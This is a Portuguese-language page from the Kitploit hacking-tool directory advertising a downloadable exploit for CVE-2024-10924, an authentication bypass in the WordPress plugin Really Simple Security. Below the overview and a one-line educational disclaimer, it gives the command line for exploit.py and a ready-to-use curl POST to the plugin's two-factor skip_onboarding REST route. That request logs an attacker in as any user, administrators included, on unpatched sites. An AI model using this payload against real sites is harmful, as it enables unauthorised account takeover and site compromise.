Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-10924 | Kitploit
Ferramentas/GitHubGitHub/cy3erdr4g0n/cve-2024-10924
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoAprendizado e Educação
GitHubcy3erdr4g0n/cve-2024-10924

CVE-2024-10924

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit para CVE-2024-10924 (Plugin Really Simple Security do WordPress - Bypass de Autenticação)

📌 Visão Geral

CVE-2024-10924 é uma vulnerabilidade crítica de bypass de autenticação no plugin Really Simple Security para WordPress (versões 9.0.0 a 9.1.1.1). Esta vulnerabilidade permite que atacantes não autenticados façam login como qualquer usuário (incluindo administrador) explorando uma falha na API de Autenticação de Dois Fatores (2FA).

ID do CVE: CVE-2024-10924

Severidade: 🔥 Crítica (CVSS 9.8)

Versões Afetadas: Really Simple Security 9.0.0 – 9.1.1.1

Versão Corrigida: 9.1.2

Tipo de Exploit: Bypass de Autenticação

⚠️ Aviso Legal

🚨 Este exploit é apenas para fins educacionais e de pesquisa em segurança.

O uso não autorizado em sistemas que você não possui é ilegal. O objetivo é ajudar profissionais de segurança a testar e corrigir sistemas vulneráveis.

🔧 Requisitos

Um site WordPress executando uma versão vulnerável do plugin Really Simple Security. Python 3.x ou cURL instalado para testes. O nome de usuário admin do WordPress alvo (a enumeração de usuários pode ser necessária).

Execute o script:

python3 exploit.py <url example : http://target.com> <user_id>

Manualmente com Curl

curl --request POST "http://{url}/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" -H "Content-Type: application/json" -d '{"user_id": 1, "login_nonce": "invalid_nonce"}' -v

Baixar ferramenta